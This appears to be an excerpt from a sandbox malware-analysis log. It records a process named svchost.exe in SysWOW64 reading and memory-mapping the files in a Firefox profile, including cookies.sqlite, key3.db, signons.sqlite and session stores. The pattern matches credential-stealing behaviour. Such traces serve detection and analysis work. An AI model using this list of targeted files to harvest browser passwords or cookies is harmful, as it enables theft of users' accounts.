Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0 False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0 False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
